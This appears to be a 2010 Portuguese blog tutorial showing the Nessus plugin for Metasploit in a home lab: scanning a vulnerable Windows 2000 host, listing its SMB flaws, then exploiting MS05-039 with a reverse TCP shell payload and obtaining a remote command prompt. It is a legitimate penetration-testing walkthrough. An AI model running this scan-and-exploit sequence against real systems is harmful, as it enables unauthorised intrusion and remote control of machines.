Assine a Lista Dicas-L
Receba diariamente por email as dicas
de informática publicadas neste site
Para se descadastrar, clique aqui.
Brincando com o plugin do Nessus para o Metasploit
Colaboração: Alexandro Silva
Data de Publicação: 12 de outubro de 2010
Recentemente o desenvolvedor Zate Berg disponibilizou um plug-in do Nessus para o Metasploit Framework ele está disponivel na versão em desenvolvimento do MSF.
Para os testes utilizei o seguinte cenário:
- Host Debian com Nessus e Metasploit
- Host Alvo com Windows 2000 "bugado até a alma"
Inicialmente atualizei o MSF e o Nessus e depois parti para a diversão
cd /tmp/pentest_tools/trunk svn update /opt/nessus/sbin/nessus-update-plugins /opt/nessus/sbin/nessus-service & ./msconsole | | | | (_) | _ __ ___ ___| |_ __ _ ___ _ __ | | ___ _| |_ | '_ ` _ \ / _ \ __/ _` / __| '_ \| |/ _ \| | __| | | | | | | __/ || (_| \__ \ |_) | | (_) | | |_ |_| |_| |_|\___|\__\__,_|___/ .__/|_|\___/|_|\__| | | |_| =[ metasploit v3.4.2-dev [core:3.4 api:1.0] + -- --=[ 592 exploits - 302 auxiliary + -- --=[ 225 payloads - 27 encoders - 8 nops =[ svn r10505 updated today (2010.09.28) msf>
Diversão :)
Carregando o Nessus plug-in
msf> load nessus [*] Nessus Bridge for Nessus 4.2.x [+] Type nessus_help for a command listing [*] Successfully loaded plugin: nessus Conectando... msf> nessus_connect localhost:8834 ok [+] Username: alexos [+] Password: ******* [*] Connecting to https://localhost:8834/ as alexos [*] Authenticated Listando as políticas existentes no Nessus msf> nessus_policy_list [+] Nessus Policy List ID Name Owner visability -- ---- ----- ---------- 1 attack alexos private
Iniciando a varredura
msf> nessus_scan_new 1 alexoscorelabs 192.168.0.6 [*] Creating scan from policy number 1, called "alexoscorelabs" and scanning 192.168.0.6 [*] Scan started. uid is af55d200-77a4-fe0e-7baa-90a11eeab4839ecaf20114aac8b0 Finalizada a verredura é hora de checar o relatório msf> nessus_report_hosts_ports 192.168.0.6 af55d200-77a4-fe0e-7baa-90a11eeab4839ecaf20114aac8 [+] Host Info Port Protocol Severity Service Name Sev 0 Sev 1 Sev 2 Sev 3 ---- -------- -------- ------ ------ ----- ----- ----- ----- 0 icmp 1 general 0 2 0 0 0 tcp 3 general 0 9 0 1 0 udp 1 general 0 1 0 0 21 tcp 3 ftp 1 4 2 2 135 tcp 3 epmap 1 1 0 1 135 udp 3 epmap? 0 0 0 1 137 udp 1 netbios-ns 0 1 0 0 139 tcp 1 smb 1 1 0 0 445 tcp 3 cifs 1 10 2 12 1025 tcp 3 dce-rpc 1 1 0 1 1028 udp 1 dce-rpc 0 1 0 0 5800 tcp 1 www 1 4 0 0 5801 tcp 1 www 1 3 0 0 5900 tcp 3 vnc 1 2 0 1 5901 tcp 1 vnc 1 3 0 0 Obtendo informações sobre as vulnerabilidades existentes na porta 445 ( smb ) do alvo msf> nessus_report_host_detail 192.168.0.6 445 tcp af55d200-77a4-fe0e-7baa-90a11eeab4839ecaf20114aac8b0 [+] Port Info Port Severity PluginID Plugin Name CVSS2 Exploit? CVE Risk Factor CVSS Vector ---- -------- -------- ----------- ----- -------- --- ----------- ----------- cifs (445/tcp) 1 10736 DCE Services Enumeration none . . None . cifs (445/tcp) 1 10785 SMB NativeLanManager Remote System Information Disclosure none . . None . cifs (445/tcp) 1 10394 SMB Log In Possible none false CVE-1999-0504 None . cifs (445/tcp) 1 11011 SMB Service Detection none . . None . cifs (445/tcp) 1 10395 SMB Shares Enumeration none . . None . cifs (445/tcp) 1 26920 Windows SMB NULL Session Authentication none false CVE-1999-0519 None . cifs (445/tcp) 1 17651 Obtains the password policy none . . None . cifs (445/tcp) 3 22034 MS06-035: Vulnerability in Server Service Could Allow Remote Code Execution (917159) (uncredentialed check) 7.5 true CVE-2006-1314 High CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P cifs (445/tcp) 3 19407 MS05-043: Vulnerability in Printer Spooler Service Could Allow Remote Code Execution (896423) (uncredentialed check) 10.0 true CVE-2005-1984 Critical CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C cifs (445/tcp) 3 12209 MS04-011: Security Update for Microsoft Windows (835732) (uncredentialed check) 10.0 true CVE-2003-0533 Critical CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C cifs (445/tcp) 3 12054 MS04-007: ASN.1 Vulnerability Could Allow Code Execution (828028) (uncredentialed check) 10.0 true CVE-2003-0818 Critical CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C cifs (445/tcp) 1 10859 SMB LsaQueryInformationPolicy Function SID Enumeration none true CVE-2000-1200 None . cifs (445/tcp) 3 22194 MS06-040: Vulnerability in Server Service Could Allow Remote Code Execution (921883) (uncredentialed check) 10.0 true CVE-2006-3439 Critical CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C cifs (445/tcp) 3 19408 MS05-039: Vulnerability in Plug and Play Service Could Allow Remote Code Execution (899588) (uncredentialed check) 10.0 true CVE-2005-1983 Critical CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C cifs (445/tcp) 3 21193 MS05-047: Plug and Play Remote Code Execution and Local Privilege Elevation (905749) (uncredentialed check) 10.0 false CVE-2005-2120 Critical CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C cifs (445/tcp) 2 18602 SMB svcctl MSRPC Interface SCM Service Enumeration 5.0 false CVE-2005-2150 Medium CVSS2#AV:N/AC:L/Au:N/C:P/I:N/A:N cifs (445/tcp) 2 18585 SMB Service Enumeration via \srvsvc 5.0 false CVE-2005-2150 Medium CVSS2#AV:N/AC:L/Au:N/C:P/I:N/A:N cifs (445/tcp) 3 35362 MS09-001: Microsoft Windows SMB Vulnerabilities Remote Code Execution (958687) (uncredentialed check) 10.0 . CVE-2008-4834 Critical CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C cifs (445/tcp) 1 26917 SMB Registry : Nessus Cannot Access the Windows Registry none . . None . cifs (445/tcp) 3 18502 MS05-027: Vulnerability in SMB Could Allow Remote Code Execution (896422) (uncredentialed check) 10.0 false CVE-2005-1206 Critical CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C cifs (445/tcp) 3 11835 MS03-039: Microsoft RPC Interface Buffer Overrun (824146) (uncredentialed check) 10.0 true CVE-2003-0715 Critical CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C cifs (445/tcp) 1 10860 SMB Use Host SID to Enumerate Local Users none true CVE-2000-1200 None . cifs (445/tcp) 3 11808 MS03-026: Microsoft RPC Interface Buffer Overrun (823980) 10.0 true CVE-2003-0352 Critical CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C cifs (445/tcp) 3 11110 MS02-045: Microsoft Windows SMB Protocol SMB_COM_TRANSACTION Packet Remote Overflow DoS (326830) 7.5 true CVE-2002-0724 High CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P Usando o MSF explorei a vulnerabilidade MS05-039: Vulnerability in Plug and Play Service Could Allow Remote Code Execution msf> use exploit/windows/smb/ms05_039_pnp msf exploit(ms05_039_pnp)> set RHOST 192.168.0.6 msf exploit(ms05_039_pnp)> set PAYLOAD windows/shell/reverse_tcp msf exploit(ms05_039_pnp)> set LHOST 192.168.0.3 msf exploit(ms05_039_pnp)> exploit [*] Started reverse handler on 192.168.0.3:4444 [*] Connecting to the SMB service... [*] Binding to 8d9f4e40-a03d-11ce-8f69-08003e30051b:1.0@ncacn_np:192.168.0.6[\browser] ... [*] Bound to 8d9f4e40-a03d-11ce-8f69-08003e30051b:1.0@ncacn_np:192.168.0.6[\browser] ... [*] Calling the vulnerable function... [*] Sending stage (240 bytes) to 192.168.0.6 [*] Command shell session 1 opened (192.168.0.3:4444 -> 192.168.0.6:1184) at Tue Sep 28 17:24:01 -0300 2010 [*] Server did not respond, this is expected [*] The server should have executed our payload Microsoft Windows 2000 [Version 5.00.2195] (C) Copyright 1985-1999 Microsoft Corp. C:\WINNT\system32> C:\WINNT\system32> ipconfig ipconfig Windows 2000 IP Configuration Ethernet adapter Local Area Connection: Connection-specific DNS Suffix . : IP Address. . . . . . . . . . . . : 192.168.0.6 Subnet Mask . . . . . . . . . . . : 255.255.255.0 Default Gateway . . . . . . . . . : 192.168.0.2
Estes MSF add-ons serão sempre bem-vindos, outra integração interessante é a do Metasploit com o Ethercap para testes de MITM.
Fonte: http://blog.alexos.com.br/?p=1996&lang=en
Blog do autor - http://www.alexos.org
Referências Adicionais
Referências adicionais sobre os assuntos abordados neste site podem ser encontradas em nossa Bibliografia.
